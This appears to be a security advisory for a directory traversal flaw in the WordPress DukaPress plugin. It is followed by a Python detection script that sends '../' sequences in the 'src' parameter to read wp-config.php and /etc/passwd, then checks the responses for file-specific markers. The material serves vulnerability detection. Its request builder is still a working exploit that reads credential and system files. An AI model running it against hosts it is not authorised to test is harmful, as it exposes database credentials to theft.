WordPress DukaPress 'src' Parameter Directory Traversal Vulnerability

Summary
This host is installed with the WordPress DukaPress plugin and is prone to a directory traversal vulnerability.
Impact
Successful exploitation will allow unauthenticated remote attackers to read arbitrary files that the web server process can access, for example wp-config.php with its database credentials. Impact Level: Application
Solution
Upgrade to version 2.5.4 or later. For updates refer to https://wordpress.org/plugins/dukapress
Insight
The flaw is due to the dp_img_resize function in the php/dp-functions.php script not properly sanitizing user input passed to lib/dp_image.php via the 'src' parameter. A 'src' value containing path traversal sequences such as '../' is not rejected, so the path resolves to files outside the intended image directory.
Affected
WordPress DukaPress plugin before version 2.5.4
Detection
Send a crafted 'src' value containing '../' sequences to lib/dp_image.php via an HTTP GET request and check whether the response contains the contents of a file that the script should not be able to read. Match on a distinctive marker of the requested file (for example a DB_NAME define from wp-config.php); a 200 response on its own, an image, or a PHP error message does not confirm the flaw.
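The check described above, as an added example in Python that is not part of the original advisory or of the DukaPress plugin. It assumes (none of this is stated by the advisory) that the vulnerable script is reachable at wp-content/plugins/dukapress/lib/dp_image.php under the WordPress root, that the 'src' value is resolved relative to that lib/ directory so three '../' segments reach the WordPress root, and that a successful traversal returns the raw file contents in the response body. The sample response bodies are constructed for the offline test.

```python
"""Detection helper for the DukaPress 'src' directory traversal.

Added example, not code from the advisory or the plugin. Paths, traversal
depth and response format are assumptions, see the comments below.
"""
import re
import urllib.error
import urllib.parse
import urllib.request

# Assumed location of the vulnerable script relative to the WordPress root.
PLUGIN_SCRIPT = "wp-content/plugins/dukapress/lib/dp_image.php"

# Files to request (relative to the WordPress root after traversal) and a
# regex that only matches if the response really carries that file's content.
# wp-config.php is the safest probe: it exists on every WordPress install and
# proves the flaw without touching files outside the web root.
TARGETS = {
    "wp-config.php": re.compile(r"define\(\s*['\"]DB_NAME['\"]", re.I),
    # For /etc/passwd the extra '../' segments beyond the web root are
    # harmless: '..' at '/' is a no-op on POSIX systems.
    "../../../../../../etc/passwd": re.compile(r"^root:[^\n]*:0:0:", re.M),
}

# Constructed sample bodies, used only to exercise looks_like_leak() offline.
SAMPLE_LEAKED_WP_CONFIG = (
    "<?php\n"
    "define( 'DB_NAME', 'wordpress' );\n"
    "define( 'DB_USER', 'wp' );\n"
)
SAMPLE_LEAKED_PASSWD = "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
SAMPLE_NORMAL_IMAGE = "\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR"
SAMPLE_PHP_WARNING = "<br /><b>Warning</b>: imagecreatefromstring(): Data is not in a recognized format\n"


def build_probe_url(base_url: str, target: str, depth: int = 3) -> str:
    """Build the GET URL that asks dp_image.php to open `target`.

    `depth` is the assumed number of '../' segments needed to climb from the
    plugin's lib/ directory to the WordPress root (lib -> dukapress -> plugins
    -> wp-content -> root is three).
    """
    src = "../" * depth + target
    query = urllib.parse.urlencode({"src": src})
    return f"{base_url.rstrip('/')}/{PLUGIN_SCRIPT}?{query}"


def looks_like_leak(target: str, body: str) -> bool:
    """True only if `body` carries a marker that belongs to `target`.

    An HTTP 200, an image, or a PHP warning is not evidence; only the
    file-specific pattern counts, which keeps false positives out of reports.
    """
    pattern = TARGETS[target]
    return pattern.search(body) is not None


def probe(base_url: str, target: str = "wp-config.php", depth: int = 3,
          timeout: float = 10.0):
    """Send the crafted request and classify the response.

    Returns True (traversal confirmed), False (response seen, no leak) or
    None (no usable response: connection error, timeout, 4xx/5xx).
    Only run against hosts you are authorized to test.
    """
    url = build_probe_url(base_url, target, depth)
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            # 64 KiB is plenty for the marker; avoids slurping large files.
            body = resp.read(65536).decode("utf-8", errors="replace")
    except (urllib.error.URLError, OSError):
        return None
    return looks_like_leak(target, body)


if __name__ == "__main__":
    import sys
    base = sys.argv[1] if len(sys.argv) > 1 else "http://example.test"
    print(build_probe_url(base, "wp-config.php"))
    print("vulnerable" if probe(base) else "not confirmed")
```

The marker-based classification is the part worth copying into other traversal checks: the scanner should assert on content that could only have come from the requested file, and treat an error page or an unchanged image as "not confirmed" rather than as a hit.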
References